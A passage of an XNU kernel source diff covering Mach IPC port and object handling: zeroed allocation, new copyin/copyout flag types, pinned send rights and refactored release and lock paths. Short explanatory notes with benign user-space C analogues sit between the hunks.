@@ -685,8 +665,8 @@ ipc_object_copyin_from_kernel(
                ip_lock(port);
                if (ip_active(port)) {
                        assert(port->ip_srights > 0);
-                       port->ip_srights++;
                }
+               port->ip_srights++;
                ip_reference(port);
                ip_unlock(port);
                break;
@@ -908,7 +888,7 @@ ipc_object_insert_send_right(
  *     Routine:        ipc_object_copyout
  *     Purpose:
  *             Copyout a capability, placing it into a space.
- *             If successful, consumes a ref for the object.
+ *             Always consumes a ref for the object.
  *     Conditions:
  *             Nothing locked.
  *     Returns:
@@ -926,12 +906,14 @@ ipc_object_copyout(
        ipc_space_t             space,
        ipc_object_t            object,
        mach_msg_type_name_t    msgt_name,
+       ipc_object_copyout_flags_t flags,
        mach_port_context_t     *context,
        mach_msg_guard_flags_t  *guard_flags,
        mach_port_name_t        *namep)
 {
        struct knote *kn = current_thread()->ith_knote;
        mach_port_name_t name;
+       ipc_port_t port = ip_object_to_port(object);
        ipc_entry_t entry;
        kern_return_t kr;
 
@@ -939,73 +921,98 @@ ipc_object_copyout(
        assert(io_otype(object) == IOT_PORT);
 
        if (ITH_KNOTE_VALID(kn, msgt_name)) {
-               filt_machport_turnstile_prepare_lazily(kn,
-                   msgt_name, ip_object_to_port(object));
+               filt_machport_turnstile_prepare_lazily(kn, msgt_name, port);
        }
 
        is_write_lock(space);
 
        for (;;) {
+               ipc_port_t port_subst = IP_NULL;
+
                if (!is_active(space)) {
                        is_write_unlock(space);
-                       return KERN_INVALID_TASK;
-               }
-
-               if ((msgt_name != MACH_MSG_TYPE_PORT_SEND_ONCE) &&
-                   ipc_right_reverse(space, object, &name, &entry)) {
-                       /* object is locked and active */
-
-                       assert(entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE);
-                       break;
+                       kr = KERN_INVALID_TASK;
+                       goto out;
                }
 
-
-               name = CAST_MACH_PORT_TO_NAME(object);
-               kr = ipc_entry_get(space, &name, &entry);
+               kr = ipc_entries_hold(space, 1);
                if (kr != KERN_SUCCESS) {
                        /* unlocks/locks space, so must start again */
 
                        kr = ipc_entry_grow_table(space, ITS_SIZE_NONE);
                        if (kr != KERN_SUCCESS) {
-                               return kr; /* space is unlocked */
+                               /* space is unlocked */
+                               goto out;
                        }
                        continue;
                }
 
-               assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE);
-               assert(entry->ie_object == IO_NULL);
-
                io_lock(object);
                if (!io_active(object)) {
                        io_unlock(object);
-                       ipc_entry_dealloc(space, name, entry);
                        is_write_unlock(space);
-                       return KERN_INVALID_CAPABILITY;
+                       kr = KERN_INVALID_CAPABILITY;
+                       goto out;
                }
 
                /* Don't actually copyout rights we aren't allowed to */
-               if (!ip_label_check(space, ip_object_to_port(object), msgt_name)) {
+               if (!ip_label_check(space, port, msgt_name, &flags, &port_subst)) {
                        io_unlock(object);
-                       ipc_entry_dealloc(space, name, entry);
                        is_write_unlock(space);
-                       return KERN_INVALID_CAPABILITY;
+                       assert(port_subst == IP_NULL);
+                       kr = KERN_INVALID_CAPABILITY;
+                       goto out;
+               }
+
+               /* is the kolabel requesting a substitution */
+               if (port_subst != IP_NULL) {
+                       /*
+                        * port is unlocked, its right consumed
+                        * space is unlocked
+                        */
+                       assert(msgt_name == MACH_MSG_TYPE_PORT_SEND);
+                       port = port_subst;
+                       if (!IP_VALID(port)) {
+                               object = IO_DEAD;
+                               kr = KERN_INVALID_CAPABILITY;
+                               goto out;
+                       }
+
+                       object = ip_to_object(port);
+                       is_write_lock(space);
+                       continue;
                }
 
-               entry->ie_object = object;
                break;
        }
 
        /* space is write-locked and active, object is locked and active */
 
+       if ((msgt_name != MACH_MSG_TYPE_PORT_SEND_ONCE) &&
+           ipc_right_reverse(space, object, &name, &entry)) {
+               assert(entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE);
+       } else {
+               ipc_entry_claim(space, &name, &entry);
+
+               assert(!ipc_right_inuse(entry));
+               assert(entry->ie_object == IO_NULL);
+
+               entry->ie_object = object;
+       }
+
        kr = ipc_right_copyout(space, name, entry,
-           msgt_name, context, guard_flags, object);
+           msgt_name, flags, context, guard_flags, object);
 
        /* object is unlocked */
        is_write_unlock(space);
 
+out:
        if (kr == KERN_SUCCESS) {
                *namep = name;
+       } else if (IO_VALID(object)) {
+               ipc_object_destroy(object, msgt_name);
        }
+
        return kr;
 }
 
@@ -1035,6 +1042,7 @@ ipc_object_copyout_name(
        mach_msg_type_name_t    msgt_name,
        mach_port_name_t        name)
 {
+       ipc_port_t port = ip_object_to_port(object);
        mach_port_name_t oname;
        ipc_entry_t oentry;
        ipc_entry_t entry;
@@ -1054,52 +1062,48 @@ ipc_object_copyout_name(
        }
        /* space is write-locked and active */
 
+       io_lock(object);
+
+       /*
+        * Don't actually copyout rights we aren't allowed to
+        *
+        * In particular, kolabel-ed objects do not allow callers
+        * to pick the name they end up with.
+        */
+       if (!io_active(object) || ip_is_kolabeled(port)) {
+               io_unlock(object);
+               if (!ipc_right_inuse(entry)) {
+                       ipc_entry_dealloc(space, name, entry);
+               }
+               is_write_unlock(space);
+               return KERN_INVALID_CAPABILITY;
+       }
+
+       /* space is write-locked and active, object is locked and active */
+
        if ((msgt_name != MACH_MSG_TYPE_PORT_SEND_ONCE) &&
            ipc_right_reverse(space, object, &oname, &oentry)) {
-               /* object is locked and active */
-
                if (name != oname) {
                        io_unlock(object);
-
-                       if (IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE) {
+                       if (!ipc_right_inuse(entry)) {
                                ipc_entry_dealloc(space, name, entry);
                        }
-
                        is_write_unlock(space);
                        return KERN_RIGHT_EXISTS;
                }
 
                assert(entry == oentry);
                assert(entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE);
+       } else if (ipc_right_inuse(entry)) {
+               io_unlock(object);
+               is_write_unlock(space);
+               return KERN_NAME_EXISTS;
        } else {
-               if (ipc_right_inuse(space, name, entry)) {
-                       return KERN_NAME_EXISTS;
-               }
-
-               assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE);
                assert(entry->ie_object == IO_NULL);
 
-               io_lock(object);
-               if (!io_active(object)) {
-                       io_unlock(object);
-                       ipc_entry_dealloc(space, name, entry);
-                       is_write_unlock(space);
-                       return KERN_INVALID_CAPABILITY;
-               }
-
-               /* Don't actually copyout rights we aren't allowed to */
-               if (!ip_label_check(space, ip_object_to_port(object), msgt_name)) {
-                       io_unlock(object);
-                       ipc_entry_dealloc(space, name, entry);
-                       is_write_unlock(space);
-                       return KERN_INVALID_CAPABILITY;
-               }
-
                entry->ie_object = object;
        }
 
-       /* space is write-locked and active, object is locked and active */
-
 #if IMPORTANCE_INHERITANCE
        /*
         * We are slamming a receive right into the space, without
@@ -1108,8 +1112,6 @@ ipc_object_copyout_name(
         * port has assertions (and the task wants them).
         */
        if (msgt_name == MACH_MSG_TYPE_PORT_RECEIVE) {
-               ipc_port_t port = ip_object_to_port(object);
-
                if (space->is_task != TASK_NULL) {
                        task_imp = space->is_task->task_imp_base;
                        if (ipc_importance_task_is_any_receiver_type(task_imp)) {
@@ -1128,7 +1130,7 @@ ipc_object_copyout_name(
 #endif /* IMPORTANCE_INHERITANCE */
 
        kr = ipc_right_copyout(space, name, entry,
-           msgt_name, NULL, NULL, object);
+           msgt_name, IPC_OBJECT_COPYOUT_FLAGS_NONE, NULL, NULL, object);
 
        /* object is unlocked */
        is_write_unlock(space);
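
The ipc_object.c hunks above replace the io_alloc()-then-bzero() pattern with a single zeroing allocation (Z_WAITOK | Z_ZERO) and rework ipc_object_copyout() so the object reference is consumed on every exit path. As a rough user-space analogue of the allocation change (the struct and helper names below are illustrative, not XNU symbols), the difference is the same as moving from malloc() plus memset() to calloc():

#include <stdlib.h>
#include <string.h>

/* Illustrative stand-in for an IPC object; not an XNU type. */
struct obj {
	int   refs;
	void *payload;
};

/* Old shape: allocate, then zero every field by hand (io_alloc + bzero). */
static struct obj *
obj_alloc_then_bzero(void)
{
	struct obj *o = malloc(sizeof(*o));
	if (o != NULL) {
		memset(o, 0, sizeof(*o));
	}
	return o;
}

/* New shape: ask the allocator for zeroed memory up front,
 * as io_alloc(otype, Z_WAITOK | Z_ZERO) now does. */
static struct obj *
obj_alloc_zeroed(void)
{
	return calloc(1, sizeof(struct obj));
}

int
main(void)
{
	struct obj *a = obj_alloc_then_bzero();
	struct obj *b = obj_alloc_zeroed();
	free(a);
	free(b);
	return 0;
}

Zeroing at allocation time removes the per-type bzero branches and leaves no window in which a partially initialized object is handed around.
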
index 83021dd24f5675ba01395959d892257214e21cff..d67867f325fa742f2ab94746b9b9f031a8978b47 100644 (file)
@@ -85,6 +85,20 @@ typedef natural_t ipc_object_refs_t;    /* for ipc/ipc_object.h              */
 typedef natural_t ipc_object_bits_t;
 typedef natural_t ipc_object_type_t;
 
+__options_closed_decl(ipc_object_copyout_flags_t, uint32_t, {
+       IPC_OBJECT_COPYOUT_FLAGS_NONE                 = 0x0,
+       IPC_OBJECT_COPYOUT_FLAGS_PINNED               = 0x1,
+       IPC_OBJECT_COPYOUT_FLAGS_NO_LABEL_CHECK       = 0x2,
+});
+
+__options_closed_decl(ipc_object_copyin_flags_t, uint32_t, {
+       IPC_OBJECT_COPYIN_FLAGS_NONE                     = 0x0,
+       IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND     = 0x1, /* Dest port contains an immovable send right */
+       IPC_OBJECT_COPYIN_FLAGS_SOFT_FAIL_IMMOVABLE_SEND = 0x2, /* Silently fail copyin without guard exception */
+       IPC_OBJECT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE     = 0x4,
+       IPC_OBJECT_COPYIN_FLAGS_DEADOK                   = 0x8,
+});
+
 /*
  * The ipc_object is used to both tag and reference count these two data
  * structures, and (Noto Bene!) pointers to either of these or the
@@ -156,8 +170,11 @@ struct ipc_object_header {
 extern zone_t ipc_object_zones[IOT_NUMBER];
 extern lck_grp_t        ipc_lck_grp;
 
-#define io_alloc(otype)         \
-               ((ipc_object_t) zalloc(ipc_object_zones[(otype)]))
+static inline ipc_object_t
+io_alloc(unsigned int otype, zalloc_flags_t flags)
+{
+       return zalloc_flags(ipc_object_zones[otype], flags);
+}
 
 extern void     io_free(
        unsigned int    otype,
@@ -333,7 +350,7 @@ extern kern_return_t ipc_object_copyin(
        ipc_object_t            *objectp,
        mach_port_context_t     context,
        mach_msg_guard_flags_t  *guard_flags,
-       uint16_t                kmsg_flags);
+       ipc_object_copyin_flags_t copyin_flags);
 
 /* Copyin a naked capability from the kernel */
 extern void ipc_object_copyin_from_kernel(
@@ -361,6 +378,7 @@ extern kern_return_t ipc_object_copyout(
        ipc_space_t             space,
        ipc_object_t            object,
        mach_msg_type_name_t    msgt_name,
+       ipc_object_copyout_flags_t flags,
        mach_port_context_t     *context,
        mach_msg_guard_flags_t  *guard_flags,
        mach_port_name_t        *namep);
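
The header now defines closed option sets, ipc_object_copyin_flags_t and ipc_object_copyout_flags_t, in place of the old uint16_t kmsg flags. In ipc_object_copyin() above, only the two immovable-send bits are honored from the caller and DEADOK is always added. A minimal sketch of that masking, using a plain enum in place of the __options_closed_decl() macro (names are shortened stand-ins, not the kernel definitions):

#include <stdint.h>
#include <stdio.h>

/* Plain-enum stand-in for the __options_closed_decl() flag set. */
typedef uint32_t copyin_flags_t;
enum {
	COPYIN_NONE                     = 0x0,
	COPYIN_ALLOW_IMMOVABLE_SEND     = 0x1,
	COPYIN_SOFT_FAIL_IMMOVABLE_SEND = 0x2,
	COPYIN_ALLOW_DEAD_SEND_ONCE     = 0x4,
	COPYIN_DEADOK                   = 0x8,
};

/* Mirrors the masking at the top of ipc_object_copyin(): only the two
 * immovable-send bits pass through from the caller, and DEADOK is
 * always added. */
static copyin_flags_t
effective_copyin_flags(copyin_flags_t caller)
{
	copyin_flags_t allowed = COPYIN_ALLOW_IMMOVABLE_SEND |
	    COPYIN_SOFT_FAIL_IMMOVABLE_SEND;
	return (caller & allowed) | COPYIN_DEADOK;
}

int
main(void)
{
	/* ALLOW_DEAD_SEND_ONCE is stripped; only DEADOK remains (0x8). */
	printf("0x%x\n", effective_copyin_flags(COPYIN_ALLOW_DEAD_SEND_ONCE));
	/* ALLOW_IMMOVABLE_SEND survives and DEADOK is added (0x9). */
	printf("0x%x\n", effective_copyin_flags(COPYIN_ALLOW_IMMOVABLE_SEND));
	return 0;
}
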
index 2aa10cceb2a90fcf09c76db56b9dbbc4e54fd30a..2b7c9217ca75050241a10d47ece164b46a1f0a6f 100644 (file)
@@ -83,6 +83,7 @@
 #include <ipc/ipc_entry.h>
 #include <ipc/ipc_space.h>
 #include <ipc/ipc_object.h>
+#include <ipc/ipc_right.h>
 #include <ipc/ipc_port.h>
 #include <ipc/ipc_pset.h>
 #include <ipc/ipc_kmsg.h>
@@ -641,6 +642,8 @@ ipc_port_clear_receiver(
  *     Purpose:
  *             Initializes a newly-allocated port.
  *             Doesn't touch the ip_object fields.
+ *
+ *             The memory is expected to be zero initialized (allocated with Z_ZERO).
  */
 
 void
@@ -655,46 +658,23 @@ ipc_port_init(
        port->ip_receiver = space;
        port->ip_receiver_name = name;
 
-       port->ip_mscount = 0;
-       port->ip_srights = 0;
-       port->ip_sorights = 0;
        if (flags & IPC_PORT_INIT_MAKE_SEND_RIGHT) {
                port->ip_srights = 1;
                port->ip_mscount = 1;
        }
 
-       port->ip_nsrequest = IP_NULL;
-       port->ip_pdrequest = IP_NULL;
-       port->ip_requests = IPR_NULL;
-
-       port->ip_premsg = IKM_NULL;
-       port->ip_context = 0;
-       port->ip_reply_context = 0;
-
-       port->ip_sprequests  = 0;
-       port->ip_spimportant = 0;
-       port->ip_impdonation = 0;
-       port->ip_tempowner   = 0;
-
-       port->ip_guarded      = 0;
-       port->ip_strict_guard = 0;
-       port->ip_immovable_receive = 0;
-       port->ip_no_grant    = 0;
-       port->ip_immovable_send = 0;
-       port->ip_impcount    = 0;
-
        if (flags & IPC_PORT_INIT_FILTER_MESSAGE) {
                port->ip_object.io_bits |= IP_BIT_FILTER_MSG;
        }
 
        port->ip_tg_block_tracking = (flags & IPC_PORT_INIT_TG_BLOCK_TRACKING) != 0;
-       port->ip_specialreply = (flags & IPC_PORT_INIT_SPECIAL_REPLY) != 0;
-       port->ip_sync_link_state = PORT_SYNC_LINK_ANY;
-       port->ip_sync_bootstrap_checkin = 0;
 
-       ipc_special_reply_port_bits_reset(port);
+       if (flags & IPC_PORT_INIT_SPECIAL_REPLY) {
+               port->ip_specialreply = true;
+               port->ip_immovable_receive = true;
+       }
 
-       port->ip_send_turnstile = TURNSTILE_NULL;
+       port->ip_sync_link_state = PORT_SYNC_LINK_ANY;
 
        ipc_mqueue_kind_t kind = IPC_MQUEUE_KIND_NONE;
        if (flags & IPC_PORT_INIT_MESSAGE_QUEUE) {
@@ -1537,7 +1517,7 @@ ipc_port_send_update_inheritor(
        struct knote *kn;
        turnstile_update_flags_t inheritor_flags = TURNSTILE_INHERITOR_TURNSTILE;
 
-       assert(imq_held(mqueue));
+       imq_held(mqueue);
 
        if (!ip_active(port)) {
                /* this port is no longer active, it should not push anywhere */
@@ -2325,6 +2305,42 @@ ipc_port_get_watchport_inheritor(
        return ipc_port_watchport_elem(port)->twe_task->watchports->tw_thread;
 }
 
+/*
+ *     Routine:        ipc_port_get_receiver_task
+ *     Purpose:
+ *             Returns receiver task pointer and its pid (if any) for port.
+ *
+ *     Conditions:
+ *             Nothing locked.
+ */
+pid_t
+ipc_port_get_receiver_task(ipc_port_t port, uintptr_t *task)
+{
+       task_t receiver = TASK_NULL;
+       pid_t pid = -1;
+
+       if (!port) {
+               goto out;
+       }
+
+       ip_lock(port);
+       if (ip_active(port) &&
+           MACH_PORT_VALID(port->ip_receiver_name) &&
+           port->ip_receiver &&
+           port->ip_receiver != ipc_space_kernel &&
+           port->ip_receiver != ipc_space_reply) {
+               receiver = port->ip_receiver->is_task;
+               pid = task_pid(receiver);
+       }
+       ip_unlock(port);
+
+out:
+       if (task) {
+               *task = (uintptr_t)receiver;
+       }
+       return pid;
+}
+
 /*
  *     Routine:        ipc_port_impcount_delta
  *     Purpose:
@@ -2688,10 +2704,11 @@ ipc_port_copy_send(
  *             Nothing locked.
  */
 
-mach_port_name_t
-ipc_port_copyout_send(
+static mach_port_name_t
+ipc_port_copyout_send_internal(
        ipc_port_t      sright,
-       ipc_space_t     space)
+       ipc_space_t     space,
+       ipc_object_copyout_flags_t flags)
 {
        mach_port_name_t name;
 
@@ -2699,10 +2716,8 @@ ipc_port_copyout_send(
                kern_return_t kr;
 
                kr = ipc_object_copyout(space, ip_to_object(sright),
-                   MACH_MSG_TYPE_PORT_SEND, NULL, NULL, &name);
+                   MACH_MSG_TYPE_PORT_SEND, flags, NULL, NULL, &name);
                if (kr != KERN_SUCCESS) {
-                       ipc_port_release_send(sright);
-
                        if (kr == KERN_INVALID_CAPABILITY) {
                                name = MACH_PORT_DEAD;
                        } else {
@@ -2716,28 +2731,38 @@ ipc_port_copyout_send(
        return name;
 }
 
+mach_port_name_t
+ipc_port_copyout_send(
+       ipc_port_t      sright,
+       ipc_space_t     space)
+{
+       return ipc_port_copyout_send_internal(sright, space, IPC_OBJECT_COPYOUT_FLAGS_NONE);
+}
+
+mach_port_name_t
+ipc_port_copyout_send_pinned(
+       ipc_port_t      sright,
+       ipc_space_t     space)
+{
+       return ipc_port_copyout_send_internal(sright, space, IPC_OBJECT_COPYOUT_FLAGS_PINNED);
+}
+
 /*
- *     Routine:        ipc_port_release_send
+ *     Routine:        ipc_port_release_send_and_unlock
  *     Purpose:
  *             Release a naked send right.
  *             Consumes a ref for the port.
  *     Conditions:
- *             Nothing locked.
+ *             Port is valid and locked on entry
+ *             Port is unlocked on exit.
  */
-
 void
-ipc_port_release_send(
+ipc_port_release_send_and_unlock(
        ipc_port_t      port)
 {
        ipc_port_t nsrequest = IP_NULL;
        mach_port_mscount_t mscount;
 
-       if (!IP_VALID(port)) {
-               return;
-       }
-
-       ip_lock(port);
-
        assert(port->ip_srights > 0);
        if (port->ip_srights == 0) {
                panic("Over-release of port %p send right!", port);
@@ -2765,6 +2790,25 @@ ipc_port_release_send(
        }
 }
 
+/*
+ *     Routine:        ipc_port_release_send
+ *     Purpose:
+ *             Release a naked send right.
+ *             Consumes a ref for the port.
+ *     Conditions:
+ *             Nothing locked.
+ */
+
+void
+ipc_port_release_send(
+       ipc_port_t      port)
+{
+       if (IP_VALID(port)) {
+               ip_lock(port);
+               ipc_port_release_send_and_unlock(port);
+       }
+}
+
 /*
  *     Routine:        ipc_port_make_sonce_locked
  *     Purpose:
@@ -2895,17 +2939,16 @@ ipc_port_alloc_special(
 {
        ipc_port_t port;
 
-       port = ip_object_to_port(io_alloc(IOT_PORT));
+       port = ip_object_to_port(io_alloc(IOT_PORT, Z_WAITOK | Z_ZERO));
        if (port == IP_NULL) {
                return IP_NULL;
        }
 
-#if     MACH_ASSERT
+#if MACH_ASSERT
        uintptr_t buf[IP_CALLSTACK_MAX];
        ipc_port_callstack_init_debug(&buf[0], IP_CALLSTACK_MAX);
 #endif /* MACH_ASSERT */
 
-       bzero((char *)port, sizeof(*port));
        io_lock_init(ip_to_object(port));
        port->ip_references = 1;
        port->ip_object.io_bits = io_makebits(TRUE, IOT_PORT, 0);
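
ipc_port.c now splits send-right release into a locked core, ipc_port_release_send_and_unlock(), plus a thin wrapper that validates and locks before calling it, and adds ipc_port_get_receiver_task() for callers that only need the receiver's pid. A small pthread-based sketch of the locked-core/wrapper split (types and names here are illustrative, not the kernel's):

#include <pthread.h>
#include <stdbool.h>
#include <stdlib.h>

/* Illustrative refcounted object; not an XNU type. */
struct ref {
	pthread_mutex_t lock;
	int count;
};

/* Locked variant: caller holds r->lock, we drop it before returning,
 * mirroring ipc_port_release_send_and_unlock(). */
static void
ref_release_locked(struct ref *r)
{
	bool last = (--r->count == 0);
	pthread_mutex_unlock(&r->lock);
	if (last) {
		pthread_mutex_destroy(&r->lock);
		free(r);
	}
}

/* Unlocked wrapper: validate, take the lock, defer to the locked variant,
 * mirroring the reworked ipc_port_release_send(). */
static void
ref_release(struct ref *r)
{
	if (r == NULL) {
		return;
	}
	pthread_mutex_lock(&r->lock);
	ref_release_locked(r);
}

int
main(void)
{
	struct ref *r = calloc(1, sizeof(*r));
	pthread_mutex_init(&r->lock, NULL);
	r->count = 1;
	ref_release(r);
	return 0;
}

The point of the locked variant is to let callers that already hold the port lock release the right without dropping and retaking it; the wrapper preserves the old "nothing locked" contract for everyone else.
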
index 2784c3c732286974201f17c594f5ceddd33fbd60..5dfcabe5f8f6f5f9e05cc78460865ddcb2c4ea38 100644 (file)
@@ -141,8 +141,9 @@ struct ipc_port {
        struct ipc_port *ip_pdrequest;
        struct ipc_port_request *ip_requests;
        union {
-               struct ipc_kmsg *premsg;
+               struct ipc_kmsg *XNU_PTRAUTH_SIGNED_PTR("ipc_port.premsg") premsg;
                struct turnstile *send_turnstile;
+               ipc_port_t XNU_PTRAUTH_SIGNED_PTR("ipc_port.alt_port") alt_port;
        } kdata2;
 
        mach_vm_address_t ip_context;
@@ -160,7 +161,8 @@ struct ipc_port {
            ip_no_grant:1,              /* Port wont accept complex messages containing (ool) port descriptors */
            ip_immovable_send:1,        /* No send(once) rights to this port can be moved out of a space */
            ip_tg_block_tracking:1,     /* Track blocking relationship between thread groups during sync IPC */
-           ip_impcount:17;             /* number of importance donations in nested queue */
+           ip_pinned: 1,               /* Can't deallocate the last send right from a space while the bit is set */
+           ip_impcount:16;             /* number of importance donations in nested queue */
 
        mach_port_mscount_t ip_mscount;
        mach_port_rights_t ip_srights;
@@ -201,6 +203,7 @@ struct ipc_port {
 
 #define ip_premsg               kdata2.premsg
 #define ip_send_turnstile       kdata2.send_turnstile
+#define ip_alt_port             kdata2.alt_port
 
 #define port_send_turnstile(port)       (IP_PREALLOC(port) ? (port)->ip_premsg->ikm_turnstile : (port)->ip_send_turnstile)
 
@@ -284,10 +287,10 @@ MACRO_END
 
 #define ip_kotype(port)         io_kotype(ip_to_object(port))
 #define ip_is_kobject(port)     io_is_kobject(ip_to_object(port))
+#define ip_is_control(port) \
+       (ip_is_kobject(port) && (ip_kotype(port) == IKOT_TASK_CONTROL || ip_kotype(port) == IKOT_THREAD_CONTROL))
 #define ip_is_kolabeled(port)   io_is_kolabeled(ip_to_object(port))
 #define ip_get_kobject(port)    ipc_kobject_get(port)
-#define ip_label_check(space, port, msgt_name) \
-       (!ip_is_kolabeled(port) || ipc_kobject_label_check((space), (port), (msgt_name)))
 
 #define ip_full_kernel(port)    imq_full_kernel(&(port)->ip_messages)
 #define ip_full(port)           imq_full(&(port)->ip_messages)
@@ -678,11 +681,17 @@ extern mach_port_name_t ipc_port_copyout_send(
        ipc_port_t      sright,
        ipc_space_t     space);
 
+extern mach_port_name_t ipc_port_copyout_send_pinned(
+       ipc_port_t      sright,
+       ipc_space_t     space);
+
 extern void ipc_port_thread_group_blocked(
        ipc_port_t      port);
 
 extern void ipc_port_thread_group_unblocked(void);
 
+extern void ipc_port_release_send_and_unlock(
+       ipc_port_t      port);
 #endif /* MACH_KERNEL_PRIVATE */
 
 #if KERNEL_PRIVATE
@@ -717,10 +726,13 @@ extern void ipc_port_release_sonce(
 extern void ipc_port_release_receive(
        ipc_port_t      port);
 
-/* finalize the destruction of a port before it gets freed */
+/* Finalize the destruction of a port before it gets freed */
 extern void ipc_port_finalize(
        ipc_port_t      port);
 
+/* Get receiver task and its pid (if any) for port. */
+extern pid_t ipc_port_get_receiver_task(ipc_port_t port, uintptr_t *task);
+
 /* Allocate a port in a special space */
 extern ipc_port_t ipc_port_alloc_special(
        ipc_space_t             space,
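
The ipc_port.h hunk carves an ip_pinned bit out of the flag word by narrowing ip_impcount from 17 to 16 bits, so the flags still fit the same word. A stand-alone sketch of that kind of layout change (the structs below are stand-ins, not the real struct ipc_port):

#include <stdint.h>
#include <stdio.h>

/* Stand-ins for the flag word; only the fields touched by the diff are kept. */
struct port_bits_before {
	uint32_t other:15;
	uint32_t ip_impcount:17;   /* importance donations */
};

struct port_bits_after {
	uint32_t other:15;
	uint32_t ip_pinned:1;      /* last send right may not leave the space */
	uint32_t ip_impcount:16;   /* narrowed by one bit to make room */
};

int
main(void)
{
	/* On the usual ABIs both layouts still occupy a single 32-bit word. */
	printf("before: %zu bytes, after: %zu bytes\n",
	    sizeof(struct port_bits_before), sizeof(struct port_bits_after));
	return 0;
}
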
index 7f247520f768f559507ee2086dd67d4c4d179eb6..3af85d1dfb9b5faf961af53713ecb2c3d790a73c 100644 (file)
@@ -176,13 +176,11 @@ ipc_pset_alloc_special(
        assert(space->is_table == IE_NULL);
        assert(!is_active(space));
 
-       pset = ips_object_to_pset(io_alloc(IOT_PORT_SET));
+       pset = ips_object_to_pset(io_alloc(IOT_PORT_SET, Z_WAITOK | Z_ZERO));
        if (pset == IPS_NULL) {
                return IPS_NULL;
        }
 
-       bzero((char *)pset, sizeof(*pset));
-
        io_lock_init(ips_to_object(pset));
        pset->ips_references = 1;
        pset->ips_object.io_bits = io_makebits(TRUE, IOT_PORT_SET, 0);
@@ -991,7 +989,7 @@ filt_machportevent(struct knote *kn, long hint __assert_only)
        int result = 0;
 
        /* mqueue locked by caller */
-       assert(imq_held(mqueue));
+       imq_held(mqueue);
        assert(hint != NOTE_REVOKE);
        if (imq_is_valid(mqueue)) {
                assert(!imq_is_set(mqueue));
index 78fd32c6e7fafd277e834b918f72f0a0d5c29d43..49ce9226865347ab4cd77be10ffe06fded04972e 100644 (file)
@@ -182,13 +182,13 @@ ipc_right_lookup_two_write(
  *             Translate (space, object) -> (name, entry).
  *             Only finds send/receive rights.
  *             Returns TRUE if an entry is found; if so,
- *             the object is locked and active.
+ *             the object is active.
  *     Conditions:
  *             The space must be locked (read or write) and active.
- *             Nothing else locked.
+ *             The port is locked and active.
  */
 
-boolean_t
+bool
 ipc_right_reverse(
        ipc_space_t             space,
        ipc_object_t            object,
@@ -205,13 +205,9 @@ ipc_right_reverse(
        assert(io_otype(object) == IOT_PORT);
 
        port = ip_object_to_port(object);
+       require_ip_active(port);
 
-       ip_lock(port);
-       if (!ip_active(port)) {
-               ip_unlock(port);
-
-               return FALSE;
-       }
+       ip_lock_held(port);
 
        if (port->ip_receiver == space) {
                name = port->ip_receiver_name;
@@ -225,7 +221,7 @@ ipc_right_reverse(
 
                *namep = name;
                *entryp = entry;
-               return TRUE;
+               return true;
        }
 
        if (ipc_hash_lookup(space, ip_to_object(port), namep, entryp)) {
@@ -233,11 +229,10 @@ ipc_right_reverse(
                assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_SEND);
                assert(port == ip_object_to_port(entry->ie_object));
 
-               return TRUE;
+               return true;
        }
 
-       ip_unlock(port);
-       return FALSE;
+       return false;
 }
 
 /*
@@ -304,7 +299,7 @@ ipc_right_request_alloc(
                        port = ip_object_to_port(entry->ie_object);
                        assert(port != IP_NULL);
 
-                       if (!ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+                       if (!ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                                /* port is locked and active */
 
                                /* if no new request, just cancel previous */
@@ -468,27 +463,20 @@ ipc_right_request_cancel(
  *             Returns TRUE if it is.
  *     Conditions:
  *             The space is write-locked and active.
- *             It is unlocked if the entry is inuse.
  */
 
-boolean_t
+bool
 ipc_right_inuse(
-       ipc_space_t                     space,
-       __unused mach_port_name_t       name,
-       ipc_entry_t                     entry)
+       ipc_entry_t entry)
 {
-       if (IE_BITS_TYPE(entry->ie_bits) != MACH_PORT_TYPE_NONE) {
-               is_write_unlock(space);
-               return TRUE;
-       }
-       return FALSE;
+       return IE_BITS_TYPE(entry->ie_bits) != MACH_PORT_TYPE_NONE;
 }
 
 /*
  *     Routine:        ipc_right_check
  *     Purpose:
  *             Check if the port has died.  If it has,
- *              and IPC_RIGHT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE is not
+ *              and IPC_OBJECT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE is not
  *              passed and it is not a send once right then
  *             clean up the entry and return TRUE.
  *     Conditions:
@@ -506,7 +494,7 @@ ipc_right_check(
        ipc_port_t               port,
        mach_port_name_t         name,
        ipc_entry_t              entry,
-       ipc_right_copyin_flags_t flags)
+       ipc_object_copyin_flags_t flags)
 {
        ipc_entry_bits_t bits;
 
@@ -515,7 +503,7 @@ ipc_right_check(
 
        ip_lock(port);
        if (ip_active(port) ||
-           ((flags & IPC_RIGHT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE) &&
+           ((flags & IPC_OBJECT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE) &&
            entry->ie_request == IE_REQ_NONE &&
            (entry->ie_bits & MACH_PORT_TYPE_SEND_ONCE))) {
                return FALSE;
@@ -861,6 +849,7 @@ ipc_right_destroy(
  *     Returns:
  *             KERN_SUCCESS            A user ref was released.
  *             KERN_INVALID_RIGHT      Entry has wrong type.
+ *             KERN_INVALID_CAPABILITY Deallocating a pinned right.
  */
 
 kern_return_t
@@ -933,7 +922,7 @@ dead_name:
                port = ip_object_to_port(entry->ie_object);
                assert(port != IP_NULL);
 
-               if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+               if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                        bits = entry->ie_bits;
                        assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_DEAD_NAME);
                        goto dead_name;     /* it will release port */
@@ -976,7 +965,7 @@ dead_name:
                port = ip_object_to_port(entry->ie_object);
                assert(port != IP_NULL);
 
